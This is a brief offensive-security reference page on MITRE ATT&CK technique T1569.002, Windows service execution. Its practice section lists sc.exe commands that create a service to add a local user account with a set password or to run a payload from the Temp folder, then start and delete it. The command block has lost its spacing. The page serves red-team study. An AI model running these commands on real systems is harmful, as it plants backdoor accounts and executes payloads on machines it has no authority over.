MITRE ATT&CK™ System Services - Service Execution - Technique T1569.002
Last updated
Theory
Windows services can also be leveraged to run arbitrary commands since they execute a command when started.
Practice
On windows, we can use the built in sc.exe binary to remotely interact with services
#Create a servicesc.execreateMyServicebinPath="net user munra Pass123 /add"start=autosc.execreateMyServicebinPath="C:\Windows\TEMP\payload.exe"start=auto#Start a servicesc.exestartMyService#Stop and delete a remote servicesc.exestopMyServicesc.exedeleteMyService
You may want to check this page for remote services execution :
